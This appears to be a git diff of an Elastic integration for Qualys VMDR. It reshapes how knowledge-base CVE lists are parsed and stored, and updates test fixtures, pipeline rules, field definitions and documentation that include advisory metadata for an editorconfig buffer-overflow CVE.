"MALWARE":{"MW_SRC":{"SRC_NAME":"mw","MW_LIST":{"MW_INFO":{"MW_ID":"123","MW_TYPE":"ec_glob","MW_PLATFORM":"unknown","MW_ALIAS":"unknown","MW_RATING":"2","MW_LINK":"https://litios.github.io/2023/01/14/MW-2023-0341.html"}}}}},"CVSS":{"BASE":{"#text": "5.4", "source":"service"},"TEMPORAL":"temporal","VECTOR_STRING":"vector1","ACCESS":{"VECTOR":"xy_1","COMPLEXITY":"medium"},"IMPACT":{"CONFIDENTIALITY":"high","INTEGRITY":"integrity","AVAILABILITY":"yes"},"AUTHENTICATION":"auth","EXPLOITABILITY":"exploit","REMEDIATION_LEVEL":"remedy","REPORT_CONFIDENCE":"level"},"CVSS_V3":{"BASE":"base","TEMPORAL":"temporal","VECTOR_STRING":"ax_vb","CVSS3_VERSION":"1.0.0","ATTACK":{"VECTOR":"ax_vb","COMPLEXITY":"hard"},"IMPACT":{"CONFIDENTIALITY":"confidential","INTEGRITY":"0","AVAILABILITY":"1"},"PRIVILEGES_REQUIRED":"userlevel","USER_INTERACTION":"interact","SCOPE":"4","EXPLOIT_CODE_MATURITY":"mature","REMEDIATION_LEVEL":"5","REPORT_CONFIDENCE":"confident"},"AUTOMATIC_PCI_FAIL":"fail","TITLE": "Fedora Security Update for editorconfig (ABCDEFG-2023-6e5d4757df)","PATCHABLE": "0","IS_DISABLED": "0","QID": "284008","CHANGE_LOG_LIST": {"CHANGE_LOG_INFO": [{"CHANGE_DATE": "2023-06-05T18:04:20Z","COMMENTS": "Real-time threat indicator \"High_Lateral_Movement\" added."},{"CHANGE_DATE": "2023-06-06T05:00:02Z","COMMENTS": "Exploit added."},{"CHANGE_DATE": "2023-06-06T05:00:02Z","COMMENTS": "CVSS V2 temporal score updated from \"4\" to \"4.3\"."},{"COMMENTS": "CVSS V3 temporal score updated from \"6.8\" to \"7\".","CHANGE_DATE": "2023-06-06T05:00:02Z"},{"CHANGE_DATE": "2023-06-06T06:02:45Z","COMMENTS": "Real-time threat indicator \"Exploit_Public\" added."}]},"CATEGORY": "Fedora","DISCOVERY": {"REMOTE": "0","ADDITIONAL_INFO": "Patch Available, Exploit Available","AUTH_TYPE_LIST": {"AUTH_TYPE": "Unix"}},"COMPLIANCE_LIST":{"COMPLIANCE":{"TYPE":"law","SECTION":"law_section","DESCRIPTION":"Not Provided"}},"SOLUTION_COMMENT":"comment3","SOLUTION": "Refer to Fedora security advisory Fedora 37 for updates and patch information.\n

Patch:
\nFollowing are links for downloading patches to fix the vulnerabilities:\n

ABCDEFG-2023-6e5d4757df:Fedora 37"} +{"VENDOR_REFERENCE_LIST": {"VENDOR_REFERENCE": {"ID": "ABCDEFG-2023-6e5d4757df","URL": "https://bodhi.fedoraproject.org/updates/ABCDEFG-2023-6e5d4757df"}},"THREAT_INTELLIGENCE": {"THREAT_INTEL": [{"#text": "Exploit_Public","id": "2"},{"#text": "High_Lateral_Movement","id": "4"}]},"VULN_TYPE": "Vulnerability","CONSEQUENCE": "Malicious users could use this vulnerability to change partial contents or configuration on the system. Additionally this vulnerability can also be used to cause a limited denial of service in the form of interruptions in resource availability.","CONSEQUENCE_COMMENT":"comment2","CVE_LIST": ["CVE-2023-0341"],"DETECTION_INFO":"info1","LAST_CUSTOMIZATION":{"DATETIME":"2023-06-06T06:02:48Z","USER_LOGIN":"user_login"},"BUGTRAQ_LIST":{"BUGTRAQ":{"ID":"123","URL":"https://www.bugtraq.com"}},"LAST_SERVICE_MODIFICATION_DATETIME": "2023-06-06T06:02:45Z","PCI_REASONS": {"PCI_REASON": "The QID adheres to the PCI requirements based on the CVSS basescore."},"DIAGNOSIS": "Fedora has released a security update for editorconfig to fix the vulnerabilities.

Affected OS:
Fedora 37


","DIAGNOSIS_COMMENT":"comment1","PUBLISHED_DATETIME": "2023-06-05T13:38:36Z","SEVERITY_LEVEL": "4","SUPPORTED_MODULES": "VM,CA-Linux Agent","PCI_FLAG": "0","SOFTWARE_LIST": {"SOFTWARE": {"PRODUCT": "editorconfig","VENDOR": "fedora"}},"CORRELATION": {"EXPLOITS": {"EXPLT_SRC": {"EXPLT_LIST": {"EXPLT": {"LINK": "https://litios.github.io/2023/01/14/CVE-2023-0341.html","REF": "CVE-2023-0341","DESC": "A stack buffer overflow exists in the ec_glob function of editorconfig-core-c before v0.12.6 which allowed an attacker to arbitrarily write to the stack and possibly allows remote code execution. editorconfig-core-c v0.12.6 resolved this vulnerability by bound checking all write operations over the p_pcre buffer."}},"SRC_NAME": "nvd"}}, "MALWARE":{"MW_SRC":{"SRC_NAME":"mw","MW_LIST":{"MW_INFO":{"MW_ID":"123","MW_TYPE":"ec_glob","MW_PLATFORM":"unknown","MW_ALIAS":"unknown","MW_RATING":"2","MW_LINK":"https://litios.github.io/2023/01/14/MW-2023-0341.html"}}}}},"CVSS":{"BASE":"base","TEMPORAL":"temporal","VECTOR_STRING":"vector1","ACCESS":{"VECTOR":"xy_1","COMPLEXITY":"medium"},"IMPACT":{"CONFIDENTIALITY":"high","INTEGRITY":"integrity","AVAILABILITY":"yes"},"AUTHENTICATION":"auth","EXPLOITABILITY":"exploit","REMEDIATION_LEVEL":"remedy","REPORT_CONFIDENCE":"level"},"CVSS_V3":{"BASE":"base","TEMPORAL":"temporal","VECTOR_STRING":"ax_vb","CVSS3_VERSION":"1.0.0","ATTACK":{"VECTOR":"ax_vb","COMPLEXITY":"hard"},"IMPACT":{"CONFIDENTIALITY":"confidential","INTEGRITY":"0","AVAILABILITY":"1"},"PRIVILEGES_REQUIRED":"userlevel","USER_INTERACTION":"interact","SCOPE":"4","EXPLOIT_CODE_MATURITY":"mature","REMEDIATION_LEVEL":"5","REPORT_CONFIDENCE":"confident"},"AUTOMATIC_PCI_FAIL":"fail","TITLE": "Fedora Security Update for editorconfig (ABCDEFG-2023-6e5d4757df)","PATCHABLE": "0","IS_DISABLED": "0","QID": "284008","CHANGE_LOG_LIST": {"CHANGE_LOG_INFO": [{"CHANGE_DATE": "2023-06-05T18:04:20Z","COMMENTS": "Real-time threat indicator \"High_Lateral_Movement\" added."},{"CHANGE_DATE": "2023-06-06T05:00:02Z","COMMENTS": "Exploit added."},{"CHANGE_DATE": "2023-06-06T05:00:02Z","COMMENTS": "CVSS V2 temporal score updated from \"4\" to \"4.3\"."},{"COMMENTS": "CVSS V3 temporal score updated from \"6.8\" to \"7\".","CHANGE_DATE": "2023-06-06T05:00:02Z"},{"CHANGE_DATE": "2023-06-06T06:02:45Z","COMMENTS": "Real-time threat indicator \"Exploit_Public\" added."}]},"CATEGORY": "Fedora","DISCOVERY": {"REMOTE": "0","ADDITIONAL_INFO": "Patch Available, Exploit Available","AUTH_TYPE_LIST": {"AUTH_TYPE": "Unix"}},"COMPLIANCE_LIST":{"COMPLIANCE":{"TYPE":"law","SECTION":"law_section","DESCRIPTION":"Not Provided"}},"SOLUTION_COMMENT":"comment3","SOLUTION": "Refer to Fedora security advisory Fedora 37 for updates and patch information.\n

Patch:
\nFollowing are links for downloading patches to fix the vulnerabilities:\n

ABCDEFG-2023-6e5d4757df:Fedora 37"} +{"VENDOR_REFERENCE_LIST": {"VENDOR_REFERENCE": {"ID": "ABCDEFG-2023-6e5d4757df","URL": "https://bodhi.fedoraproject.org/updates/ABCDEFG-2023-6e5d4757df"}},"THREAT_INTELLIGENCE": {"THREAT_INTEL": {"#text": "High_Lateral_Movement","id": "4"}},"VULN_TYPE": "Vulnerability","CONSEQUENCE": "Malicious users could use this vulnerability to change partial contents or configuration on the system. Additionally this vulnerability can also be used to cause a limited denial of service in the form of interruptions in resource availability.","CVE_LIST": ["CVE-2023-0341"],"LAST_SERVICE_MODIFICATION_DATETIME": "2023-06-06T06:02:45Z","PCI_REASONS": {"PCI_REASON": "The QID adheres to the PCI requirements based on the CVSS basescore."},"DIAGNOSIS": "Fedora has released a security update for editorconfig to fix the vulnerabilities.

Affected OS:
Fedora 37


","PUBLISHED_DATETIME": "2023-06-05T13:38:36Z","SEVERITY_LEVEL": "5","SUPPORTED_MODULES": "VM,CA-Linux Agent","PCI_FLAG": "0","SOFTWARE_LIST": {"SOFTWARE": {"PRODUCT": "editorconfig","VENDOR": "fedora"}},"CORRELATION": {"EXPLOITS": {"EXPLT_SRC": {"EXPLT_LIST": {"EXPLT": {"LINK": "https://litios.github.io/2023/01/14/CVE-2023-0341.html","REF": "CVE-2023-0341","DESC": "A stack buffer overflow exists in the ec_glob function of editorconfig-core-c before v0.12.6 which allowed an attacker to arbitrarily write to the stack and possibly allows remote code execution. editorconfig-core-c v0.12.6 resolved this vulnerability by bound checking all write operations over the p_pcre buffer."}},"SRC_NAME": "nvd"}}},"TITLE": "Fedora Security Update for editorconfig (ABCDEFG-2023-6e5d4757df)","PATCHABLE": "0","IS_DISABLED": "0","QID": "284008","CHANGE_LOG_LIST": {"CHANGE_LOG_INFO": {"CHANGE_DATE": "2023-06-05T18:04:20Z","COMMENTS": "Real-time threat indicator \"High_Lateral_Movement\" added."}},"CATEGORY": "Fedora","DISCOVERY": {"REMOTE": "0","ADDITIONAL_INFO": "Patch Available, Exploit Available","AUTH_TYPE_LIST": {"AUTH_TYPE": "Unix"}},"SOLUTION": "Refer to Fedora security advisory Fedora 37 for updates and patch information.\n

Patch:
\nFollowing are links for downloading patches to fix the vulnerabilities:\n

ABCDEFG-2023-6e5d4757df:Fedora 37"} +{"VENDOR_REFERENCE_LIST": {"VENDOR_REFERENCE": {"ID": "ABCDEFG-2023-6e5d4757df","URL": "https://bodhi.fedoraproject.org/updates/ABCDEFG-2023-6e5d4757df"}},"THREAT_INTELLIGENCE": {"THREAT_INTEL": [{"#text": "Exploit_Public","id": "2"},{"#text": "High_Lateral_Movement","id": "4"}]},"VULN_TYPE": "Vulnerability","CONSEQUENCE": "Malicious users could use this vulnerability to change partial contents or configuration on the system. Additionally this vulnerability can also be used to cause a limited denial of service in the form of interruptions in resource availability.","CONSEQUENCE_COMMENT":"comment2","CVE_LIST": ["CVE-2023-0341"],"DETECTION_INFO":"info1","LAST_CUSTOMIZATION":{"DATETIME":"2023-06-06T06:02:48Z","USER_LOGIN":"user_login"},"BUGTRAQ_LIST":{"BUGTRAQ":{"ID":"123","URL":"https://www.bugtraq.com"}},"LAST_SERVICE_MODIFICATION_DATETIME": "2023-06-06T06:02:45Z","PCI_REASONS": {"PCI_REASON": "The QID adheres to the PCI requirements based on the CVSS basescore."},"DIAGNOSIS": "Fedora has released a security update for editorconfig to fix the vulnerabilities.

Affected OS:
Fedora 37


","DIAGNOSIS_COMMENT":"comment1","PUBLISHED_DATETIME": "2023-06-05T13:38:36Z","SEVERITY_LEVEL": "4","SUPPORTED_MODULES": "VM,CA-Linux Agent","PCI_FLAG": "0","SOFTWARE_LIST": {"SOFTWARE": {"PRODUCT": "editorconfig","VENDOR": "fedora"}},"CORRELATION": {"EXPLOITS": {"EXPLT_SRC": {"EXPLT_LIST": {"EXPLT": {"LINK": "https://litios.github.io/2023/01/14/CVE-2023-0341.html","REF": "CVE-2023-0341","DESC": "A stack buffer overflow exists in the ec_glob function of editorconfig-core-c before v0.12.6 which allowed an attacker to arbitrarily write to the stack and possibly allows remote code execution. editorconfig-core-c v0.12.6 resolved this vulnerability by bound checking all write operations over the p_pcre buffer."}},"SRC_NAME": "nvd"}}, "MALWARE":{"MW_SRC":{"SRC_NAME":"mw","MW_LIST":{"MW_INFO":{"MW_ID":"123","MW_TYPE":"ec_glob","MW_PLATFORM":"unknown","MW_ALIAS":"unknown","MW_RATING":"2","MW_LINK":"https://litios.github.io/2023/01/14/MW-2023-0341.html"}}}}},"CVSS":{"BASE":{"#text": "5.4", "source":"service"},"TEMPORAL":"temporal","VECTOR_STRING":"vector1","ACCESS":{"VECTOR":"xy_1","COMPLEXITY":"medium"},"IMPACT":{"CONFIDENTIALITY":"high","INTEGRITY":"integrity","AVAILABILITY":"yes"},"AUTHENTICATION":"auth","EXPLOITABILITY":"exploit","REMEDIATION_LEVEL":"remedy","REPORT_CONFIDENCE":"level"},"CVSS_V3":{"BASE":"base","TEMPORAL":"temporal","VECTOR_STRING":"ax_vb","CVSS3_VERSION":"1.0.0","ATTACK":{"VECTOR":"ax_vb","COMPLEXITY":"hard"},"IMPACT":{"CONFIDENTIALITY":"confidential","INTEGRITY":"0","AVAILABILITY":"1"},"PRIVILEGES_REQUIRED":"userlevel","USER_INTERACTION":"interact","SCOPE":"4","EXPLOIT_CODE_MATURITY":"mature","REMEDIATION_LEVEL":"5","REPORT_CONFIDENCE":"confident"},"AUTOMATIC_PCI_FAIL":"fail","TITLE": "Fedora Security Update for editorconfig (ABCDEFG-2023-6e5d4757df)","PATCHABLE": "0","IS_DISABLED": "0","QID": "284008","CHANGE_LOG_LIST": {"CHANGE_LOG_INFO": [{"CHANGE_DATE": "2023-06-05T18:04:20Z","COMMENTS": "Real-time threat indicator \"High_Lateral_Movement\" added."},{"CHANGE_DATE": "2023-06-06T05:00:02Z","COMMENTS": "Exploit added."},{"CHANGE_DATE": "2023-06-06T05:00:02Z","COMMENTS": "CVSS V2 temporal score updated from \"4\" to \"4.3\"."},{"COMMENTS": "CVSS V3 temporal score updated from \"6.8\" to \"7\".","CHANGE_DATE": "2023-06-06T05:00:02Z"},{"CHANGE_DATE": "2023-06-06T06:02:45Z","COMMENTS": "Real-time threat indicator \"Exploit_Public\" added."}]},"CATEGORY": "Fedora","DISCOVERY": {"REMOTE": "0","ADDITIONAL_INFO": "Patch Available, Exploit Available","AUTH_TYPE_LIST": {"AUTH_TYPE": "Unix"}},"COMPLIANCE_LIST":{"COMPLIANCE":{"TYPE":"law","SECTION":"law_section","DESCRIPTION":"Not Provided"}},"SOLUTION_COMMENT":"comment3","SOLUTION": "Refer to Fedora security advisory Fedora 37 for updates and patch information.\n

Patch:
\nFollowing are links for downloading patches to fix the vulnerabilities:\n

ABCDEFG-2023-6e5d4757df:Fedora 37"} diff --git a/packages/qualys_vmdr/data_stream/knowledge_base/_dev/test/pipeline/test-knowledge-base.log-expected.json b/packages/qualys_vmdr/data_stream/knowledge_base/_dev/test/pipeline/test-knowledge-base.log-expected.json index 4281990feab..c265a235816 100644 --- a/packages/qualys_vmdr/data_stream/knowledge_base/_dev/test/pipeline/test-knowledge-base.log-expected.json +++ b/packages/qualys_vmdr/data_stream/knowledge_base/_dev/test/pipeline/test-knowledge-base.log-expected.json @@ -85,10 +85,9 @@ } } }, - "cve_list": { - "id": "CVE-2023-0341", - "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0341" - }, + "cve_list": [ + "CVE-2023-0341" + ], "cvss": { "access": { "complexity": "medium", @@ -188,21 +187,14 @@ "tags": [ "preserve_duplicate_custom_fields" ], - "url": { - "domain": "cve.mitre.org", - "extension": "cgi", - "original": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0341", - "path": "/cgi-bin/cvename.cgi", - "query": "name=CVE-2023-0341", - "scheme": "http" - }, "vulnerability": { "category": [ "Fedora" ], "description": "A stack buffer overflow exists in the ec_glob function of editorconfig-core-c before v0.12.6 which allowed an attacker to arbitrarily write to the stack and possibly allows remote code execution. editorconfig-core-c v0.12.6 resolved this vulnerability by bound checking all write operations over the p_pcre buffer.", - "id": "CVE-2023-0341", - "reference": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0341", + "id": [ + "CVE-2023-0341" + ], "severity": "Critical" } }, @@ -247,10 +239,9 @@ } } }, - "cve_list": { - "id": "CVE-2023-0341", - "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0341" - }, + "cve_list": [ + "CVE-2023-0341" + ], "diagnosis": { "value": "Fedora has released a security update for editorconfig to fix the vulnerabilities.

Affected OS:
Fedora 37


" }, @@ -298,21 +289,14 @@ "tags": [ "preserve_duplicate_custom_fields" ], - "url": { - "domain": "cve.mitre.org", - "extension": "cgi", - "original": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0341", - "path": "/cgi-bin/cvename.cgi", - "query": "name=CVE-2023-0341", - "scheme": "http" - }, "vulnerability": { "category": [ "Fedora" ], "description": "A stack buffer overflow exists in the ec_glob function of editorconfig-core-c before v0.12.6 which allowed an attacker to arbitrarily write to the stack and possibly allows remote code execution. editorconfig-core-c v0.12.6 resolved this vulnerability by bound checking all write operations over the p_pcre buffer.", - "id": "CVE-2023-0341", - "reference": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0341", + "id": [ + "CVE-2023-0341" + ], "severity": "Urgent" } }, @@ -401,10 +385,9 @@ } } }, - "cve_list": { - "id": "CVE-2023-0341", - "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0341" - }, + "cve_list": [ + "CVE-2023-0341" + ], "cvss": { "access": { "complexity": "medium", @@ -507,21 +490,14 @@ "tags": [ "preserve_duplicate_custom_fields" ], - "url": { - "domain": "cve.mitre.org", - "extension": "cgi", - "original": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0341", - "path": "/cgi-bin/cvename.cgi", - "query": "name=CVE-2023-0341", - "scheme": "http" - }, "vulnerability": { "category": [ "Fedora" ], "description": "A stack buffer overflow exists in the ec_glob function of editorconfig-core-c before v0.12.6 which allowed an attacker to arbitrarily write to the stack and possibly allows remote code execution. editorconfig-core-c v0.12.6 resolved this vulnerability by bound checking all write operations over the p_pcre buffer.", - "id": "CVE-2023-0341", - "reference": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0341", + "id": [ + "CVE-2023-0341" + ], "severity": "Critical" } } diff --git a/packages/qualys_vmdr/data_stream/knowledge_base/agent/stream/input.yml.hbs b/packages/qualys_vmdr/data_stream/knowledge_base/agent/stream/input.yml.hbs index 4c050685c26..ddcd5e05665 100644 --- a/packages/qualys_vmdr/data_stream/knowledge_base/agent/stream/input.yml.hbs +++ b/packages/qualys_vmdr/data_stream/knowledge_base/agent/stream/input.yml.hbs @@ -38,8 +38,12 @@ program: | } }).do_request().as(resp, bytes(resp.Body).decode_xml('qualys_api_2_0').as(body, { "events": (has(body.doc.KNOWLEDGE_BASE_VULN_LIST_OUTPUT.RESPONSE.VULN_LIST) ? - body.doc.KNOWLEDGE_BASE_VULN_LIST_OUTPUT.RESPONSE.VULN_LIST.VULN.map(e,{ - "message": e.encode_json() + body.doc.KNOWLEDGE_BASE_VULN_LIST_OUTPUT.RESPONSE.VULN_LIST.VULN.map(e, { + "message": e.with({"CVE_LIST": has(e.CVE_LIST) && has(e.CVE_LIST.CVE) ? + e.CVE_LIST.CVE.map(c, c.ID) + : + [] + }).encode_json() }) : has(body.doc.KNOWLEDGE_BASE_VULN_LIST_OUTPUT.RESPONSE.ID_SET) ? diff --git a/packages/qualys_vmdr/data_stream/knowledge_base/elasticsearch/ingest_pipeline/default.yml b/packages/qualys_vmdr/data_stream/knowledge_base/elasticsearch/ingest_pipeline/default.yml index 490e580de6e..19e006c1c02 100644 --- a/packages/qualys_vmdr/data_stream/knowledge_base/elasticsearch/ingest_pipeline/default.yml +++ b/packages/qualys_vmdr/data_stream/knowledge_base/elasticsearch/ingest_pipeline/default.yml @@ -35,6 +35,7 @@ processors: fields: - json.QID - json.LAST_SERVICE_MODIFICATION_DATETIME + - json.CVE_LIST target_field: _id ignore_missing: true - rename: @@ -149,9 +150,9 @@ processors: target_field: qualys_vmdr.knowledge_base.vuln_type ignore_missing: true - rename: - field: json.CVE_LIST.CVE.ID - tag: rename_CVE_LIST_CVE_ID - target_field: qualys_vmdr.knowledge_base.cve_list.id + field: json.CVE_LIST + tag: rename_CVE_LIST + target_field: qualys_vmdr.knowledge_base.cve_list ignore_missing: true - rename: field: json.CVSS.BASE @@ -303,17 +304,7 @@ processors: - set: field: vulnerability.id tag: set_vulnerability_id - copy_from: qualys_vmdr.knowledge_base.cve_list.id - ignore_empty_value: true - - rename: - field: json.CVE_LIST.CVE.URL - tag: rename_CVE_LIST_CVE_URL - target_field: qualys_vmdr.knowledge_base.cve_list.url - ignore_missing: true - - set: - field: vulnerability.reference - tag: set_vulnerability_reference - copy_from: qualys_vmdr.knowledge_base.cve_list.url + copy_from: qualys_vmdr.knowledge_base.cve_list ignore_empty_value: true - uri_parts: field: vulnerability.reference @@ -669,8 +660,7 @@ processors: - qualys_vmdr.knowledge_base.last.service_modification_datetime - qualys_vmdr.knowledge_base.qid - qualys_vmdr.knowledge_base.category - - qualys_vmdr.knowledge_base.cve_list.id - - qualys_vmdr.knowledge_base.cve_list.url + - qualys_vmdr.knowledge_base.cve_list - qualys_vmdr.knowledge_base.correlation.exploits.explt_src.list.explt.desc - qualys_vmdr.knowledge_base.severity_level tag: remove_preserve_duplicate_custom_fields diff --git a/packages/qualys_vmdr/data_stream/knowledge_base/fields/fields.yml b/packages/qualys_vmdr/data_stream/knowledge_base/fields/fields.yml index bb047a9d867..f9d78dd90db 100644 --- a/packages/qualys_vmdr/data_stream/knowledge_base/fields/fields.yml +++ b/packages/qualys_vmdr/data_stream/knowledge_base/fields/fields.yml @@ -88,12 +88,7 @@ - name: name type: keyword - name: cve_list - type: group - fields: - - name: id - type: keyword - - name: url - type: keyword + type: keyword - name: cvss type: group fields: diff --git a/packages/qualys_vmdr/data_stream/knowledge_base/manifest.yml b/packages/qualys_vmdr/data_stream/knowledge_base/manifest.yml index 9172ff5b114..93b9626e30f 100644 --- a/packages/qualys_vmdr/data_stream/knowledge_base/manifest.yml +++ b/packages/qualys_vmdr/data_stream/knowledge_base/manifest.yml @@ -15,7 +15,8 @@ streams: - name: initial_interval type: text title: Initial Interval - description: "How far back to pull the Knowledge Base data from Qualys VMDR. Supported units for this parameter are s, m, h." + description: >- + How far back to pull the Knowledge Base data from Qualys VMDR. Supported units for this parameter are s, m, h. multi: false required: true show_user: true @@ -23,7 +24,9 @@ streams: - name: interval type: text title: Interval - description: "Interval between two REST API calls. User can choose interval as per their plan mentioned in [Qualys API Limits](https://www.qualys.com/docs/qualys-api-limits.pdf). Supported units for this parameter are h/m/s." + description: >- + Interval between two REST API calls. User can choose interval as per their plan mentioned in + [Qualys API Limits](https://www.qualys.com/docs/qualys-api-limits.pdf). Supported units for this parameter are h/m/s. default: 6h multi: false required: true @@ -31,15 +34,19 @@ streams: - name: http_client_timeout type: text title: HTTP Client Timeout - description: "Duration before declaring that the HTTP client connection has timed out. Give a timeout of more than 1 minute when retrieving data which is more than 15 days old. Supported time units are ns, us, ms, s, m, h." + description: >- + Duration before declaring that the HTTP client connection has timed out. Give a timeout of more than 1 minute when + retrieving data which is more than 15 days old. Supported time units are ns, us, ms, s, m, h. Requests may take + significant time, so short timeouts are not recommended. multi: false required: true show_user: false - default: 3m + default: 10m - name: input_parameters type: text title: Input Parameters - description: "Input Parameters for the URL. param1=value¶m2=value¶m3=....*" + description: >- + Input Parameters for the URL. param1=value¶m2=value¶m3=....* multi: false required: false show_user: true diff --git a/packages/qualys_vmdr/data_stream/knowledge_base/sample_event.json b/packages/qualys_vmdr/data_stream/knowledge_base/sample_event.json index 1cdc5452356..ecf03e8e099 100644 --- a/packages/qualys_vmdr/data_stream/knowledge_base/sample_event.json +++ b/packages/qualys_vmdr/data_stream/knowledge_base/sample_event.json @@ -1,11 +1,11 @@ { "@timestamp": "2023-06-29T12:20:46.000Z", "agent": { - "ephemeral_id": "d0eb176e-bad7-47fa-9547-c1854ad7ca2d", - "id": "98ba96f5-b452-4fc7-8f5a-3d37a634ce61", + "ephemeral_id": "2680cdd8-c261-48cd-b70d-b958f911b86a", + "id": "339b7770-4966-47a8-bc07-60e4a5c83116", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.9.0" + "version": "8.12.1" }, "data_stream": { "dataset": "qualys_vmdr.knowledge_base", @@ -16,9 +16,9 @@ "version": "8.11.0" }, "elastic_agent": { - "id": "98ba96f5-b452-4fc7-8f5a-3d37a634ce61", + "id": "339b7770-4966-47a8-bc07-60e4a5c83116", "snapshot": false, - "version": "8.9.0" + "version": "8.12.1" }, "event": { "agent_id_status": "verified", @@ -27,7 +27,7 @@ ], "dataset": "qualys_vmdr.knowledge_base", "id": "11830", - "ingested": "2023-11-14T21:17:15Z", + "ingested": "2024-03-17T23:42:53Z", "kind": "alert", "type": [ "info" @@ -39,6 +39,10 @@ "qualys_vmdr": { "knowledge_base": { "category": "CGI", + "cve_list": [ + "CVE-2022-31629", + "CVE-2022-31628" + ], "discovery": { "remote": 1 }, @@ -69,6 +73,10 @@ "category": [ "CGI" ], + "id": [ + "CVE-2022-31629", + "CVE-2022-31628" + ], "severity": "Medium" } } \ No newline at end of file diff --git a/packages/qualys_vmdr/docs/README.md b/packages/qualys_vmdr/docs/README.md index 3641fc3cbcd..2fd7518bbcc 100644 --- a/packages/qualys_vmdr/docs/README.md +++ b/packages/qualys_vmdr/docs/README.md @@ -88,13 +88,13 @@ An example event for `asset_host_detection` looks as following: ```json { - "@timestamp": "2023-10-25T08:52:23.474Z", + "@timestamp": "2024-03-11T21:06:28.277Z", "agent": { - "ephemeral_id": "8365cc1b-0570-46a3-986b-eb86f03344d2", - "id": "50e7e437-d3fc-4872-8bd1-0da718796b4a", + "ephemeral_id": "798665d1-a592-4f07-8517-f7bdcdbda09f", + "id": "b7f7fd67-e199-4daf-b640-92e89c091cc6", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.9.0" + "version": "8.12.1" }, "data_stream": { "dataset": "qualys_vmdr.asset_host_detection", @@ -105,9 +105,9 @@ An example event for `asset_host_detection` looks as following: "version": "8.11.0" }, "elastic_agent": { - "id": "50e7e437-d3fc-4872-8bd1-0da718796b4a", + "id": "b7f7fd67-e199-4daf-b640-92e89c091cc6", "snapshot": false, - "version": "8.9.0" + "version": "8.12.1" }, "event": { "agent_id_status": "verified", @@ -115,7 +115,7 @@ An example event for `asset_host_detection` looks as following: "host" ], "dataset": "qualys_vmdr.asset_host_detection", - "ingested": "2023-10-25T08:52:26Z", + "ingested": "2024-03-11T21:06:40Z", "kind": "alert", "type": [ "info" @@ -142,30 +142,58 @@ An example event for `asset_host_detection` looks as following: "scanned_duration": 1113 } }, - "list": [ - { - "first": { - "found_datetime": "2023-06-28T06:04:26.000Z" + "tracking_method": "IP", + "vulnerability": { + "affect": { + "running": { + "kernel": "0" + } + }, + "first": { + "found_datetime": "2021-02-05T04:50:45.000Z" + }, + "is_disabled": false, + "is_ignored": false, + "last": { + "fixed_datetime": "2022-12-14T06:52:57.000Z", + "found_datetime": "2024-03-08T20:15:41.000Z", + "processed_datetime": "2024-03-08T20:15:41.000Z", + "test_datetime": "2024-03-08T20:15:41.000Z", + "update_datetime": "2024-03-08T20:15:41.000Z" + }, + "qds": { + "severity": "LOW", + "text": "35" + }, + "qds_factors": [ + { + "name": "CVSS", + "text": "7.7" }, - "is_disabled": false, - "is_ignored": false, - "last": { - "found_datetime": "2023-07-03T06:23:47.000Z", - "processed_datetime": "2023-07-03T06:25:17.000Z", - "test_datetime": "2023-07-03T06:23:47.000Z", - "update_datetime": "2023-07-03T06:25:17.000Z" + { + "name": "CVSS_version", + "text": "v3.x" }, - "qid": "91681", - "severity": 5, - "ssl": "0", - "status": "Active", - "times": { - "found": 11 + { + "name": "epss", + "text": "0.00232" }, - "type": "Confirmed" - } - ], - "tracking_method": "IP" + { + "name": "CVSS_vector", + "text": "AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H" + } + ], + "qid": "197595", + "results": "Package Installed Version Required Version\nlinux-cloud-tools-4.4.0 1074-aws_4.4.0-1074.84 1092\nlinux-aws-tools-4.4.0 1074_4.4.0-1074.84 1092\nlinux-aws-headers-4.4.0 1074_4.15.0-1126.135 1092\nlinux-tools-4.4.0 1074-aws_4.4.0-1074.84 1092\nlinux-aws-cloud-tools-4.4.0 1074_4.4.0-1074.84 1092", + "severity": 3, + "ssl": "0", + "status": "Active", + "times": { + "found": 5393 + }, + "type": "Confirmed", + "unique_vuln_id": "5555555555" + } } }, "related": { @@ -182,7 +210,6 @@ An example event for `asset_host_detection` looks as following: "qualys_vmdr-asset_host_detection" ] } - ``` **Exported fields** @@ -218,37 +245,6 @@ An example event for `asset_host_detection` looks as following: | qualys_vmdr.asset_host_detection.last.vm.auth.scanned_duration | | long | | qualys_vmdr.asset_host_detection.last.vm.scanned_date | | date | | qualys_vmdr.asset_host_detection.last.vm.scanned_duration | | long | -| qualys_vmdr.asset_host_detection.list.affect.exploitable_config | | keyword | -| qualys_vmdr.asset_host_detection.list.affect.running.kernel | | keyword | -| qualys_vmdr.asset_host_detection.list.affect.running.service | | keyword | -| qualys_vmdr.asset_host_detection.list.asset_cve | | keyword | -| qualys_vmdr.asset_host_detection.list.first.found_datetime | | date | -| qualys_vmdr.asset_host_detection.list.first.reopened_datetime | | date | -| qualys_vmdr.asset_host_detection.list.fqdn | | keyword | -| qualys_vmdr.asset_host_detection.list.instance | | keyword | -| qualys_vmdr.asset_host_detection.list.is_disabled | | boolean | -| qualys_vmdr.asset_host_detection.list.is_ignored | | boolean | -| qualys_vmdr.asset_host_detection.list.last.fixed_datetime | | date | -| qualys_vmdr.asset_host_detection.list.last.found_datetime | | date | -| qualys_vmdr.asset_host_detection.list.last.processed_datetime | | date | -| qualys_vmdr.asset_host_detection.list.last.reopened_datetime | | date | -| qualys_vmdr.asset_host_detection.list.last.test_datetime | | date | -| qualys_vmdr.asset_host_detection.list.last.update_datetime | | date | -| qualys_vmdr.asset_host_detection.list.port | | long | -| qualys_vmdr.asset_host_detection.list.protocol | | keyword | -| qualys_vmdr.asset_host_detection.list.qds.severity | | keyword | -| qualys_vmdr.asset_host_detection.list.qds.text | | keyword | -| qualys_vmdr.asset_host_detection.list.qds_factors.name | | keyword | -| qualys_vmdr.asset_host_detection.list.qds_factors.text | | keyword | 